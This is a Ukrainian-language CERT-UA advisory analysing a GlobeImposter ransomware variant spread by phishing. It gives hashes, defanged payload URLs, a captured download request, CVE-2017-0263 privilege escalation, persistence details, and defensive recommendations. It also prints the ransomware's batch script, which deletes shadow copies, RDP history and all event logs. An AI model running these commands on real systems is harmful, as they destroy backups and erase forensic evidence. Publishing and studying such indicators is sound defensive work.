13.09.2017 CERT-UA повідомлено про спроби розповсюдження в українському сегменті мережі Інтернет повідомлень із шкідливим програмним забезпечення, яке є оновленою версією GlobeInposter Ransomware
Спеціалістами CERT-UA проаналізовано файл, який надходив в прикріпленні до повідомлення.
[Довіреність_нa_выписку_Рабчук_Иван.7z]
md5: 48226ab07826b6873e672767a3fa2b21
https://www.virustotal.com/#/file/83b63bc383249993dffe113a41ba900d65edff54e4747b8fa382701ec4bbe8f8/detection
Даний заархівований файл виступав в якості завантажувача та містив в собі обфускований javascript кодДОВІРЕНІСТЬ.js.
[ДОВІРЕНІСТЬ.js]
md5: 027aa379bac6f35ecf826b0b56da9032
Скрипт, при наявності дозволу на виконання js файлів на комп’ютері, завантажує svc.exe
svc.exe файл позиціонується як Trojan.Win32.Filecoder.
md5: 861e0824b4515b0a9afa19da3a0cd908
Файл завантажується з наступних джерел:
hxxp://poperediylimitkv.com/hiloddfvnc/svc.exe
hxxp://book-house.org/html/files/image/svc.exe
hxxp://vkmodule.com.ua/images/svc.exe
===================
[Received new connection on port: 80.]
[New request on port 80.]
GET /html/files/image/svc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .N
ET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: book-house.org
Connection: Keep-Alive
======================
та запускає його виконання за допомогою команди Exec після визначення дати на інфікованому комп’ютері, яка не повинна бути більша за 29.10.2017.
Даний тип шифрувальника розповсюджується через поширення листів, використовуючи соціальну інженерію. Поширення по локальній мережі поки що не зафіксовано.
Виявлено, що шифрувальник файлів не функціонує, якщо в системі немає бібліотеки msxml2.dll.
Виконання svc.exe файлу.
Svc.exe під час виконання самозмінюється в програму ./svc_modificated.exe MD5:a634a68e7d2e28cf640915474745dc1f
Файл-шифрувальник експлуатує вразливість CVE-2017-0263 для підвищення привилегій.
Основною функціональністю svc_modificated.exe є шифрування файлів кореневого каталогу диску С та D. Під час виконання цього файлу опрацьовується наступне:
— для вибору файлів для шифрування відкидаються такі директорії:
Windows Defender,Internet Explorer,Kaspersky Lab,McAfee,Avira,Avast,Dr.Web,Symantec та
Symantec_Client_Security,spytech software,COMODO,
Windows,.Microsoft.Microsoft Help,Windows App Certification Kit
Windows NT,Windows Kits,Windows Mail,
Windows Media Player,Windows Multimedia Platform,
Windows Phone Kits,Windows Phone Silverlight Kits,
Windows Photo Viewer,Windows Portable Devices,Windows Sidebar
NVIDIA Corporation,Microsoft.NET,
Outlook Express,Movie Maker ,Chrome,Mozilla Firefox ,Opera,YandexBrowser,
ntldr,Internet Explorer
— ігноруються файли з розширенням:
.$er,.4db,.4dd,.4d,.4mp,.abs,.abx,.accdb,.accdc
.accdb,.accdc,.accde,.accdr,.accdt,.accdw,.accft,.awdb
.clkw,.daconnections,.dacpac,.dadiagrams,.daschema,.db-shm,.db-wa,.dtsx,.fmp12,.fmps,.itdb,.mdbhtm,.rctd,.sqlite,.sqlite3,.sqlitedb,.teacher,.wmdb,.xlgc
— використовується запис в регістр для запуску
/Software/Microsoft/Windows/CurrentVersion/RunOnce
— створюється в кореневому каталозі С файл-попередження про вимагання біткойнів або грошовий еквівалент в гривнях. PAXYHOK.html
— генеруються RSA Encryption ключ для шифрування файлів з sha224 та sha225
-щоб унеможливити відновлення зашифрованих файлів виконує скрипт та знищує всі події з лог файлів які містять значення «25a2»
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default» /va /f
reg delete «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers» /f
reg add «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers»
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F «tokens=*» 25a2 in (‘wevtutil.exe el’) DO wevtutil.exe cl «25a2»
-змінює атрибути доступу до файлів з метою шифрувння.
— вбиває процеси outlook, postgre, excel
Перелік індикаторів компрометації:
027aa379bac6f35ecf826b0b56da9032 ДОВІРЕНІСТЬ.js
48226ab07826b6873e672767a3fa2b21 Довіреність_нa_выписку_Рабчук_Иван.7z
861e0824b4515b0a9afa19da3a0cd908 svc.exe
Рекомендації CERT—UA
- Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
- Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
- Установити патч який виправляє вразливість CVE-2017-0263https://portal.msrc.microsoft.com/en-US/security-guidance
- Не працювати під правами адміна.
- Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
- Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.
Автор публікації
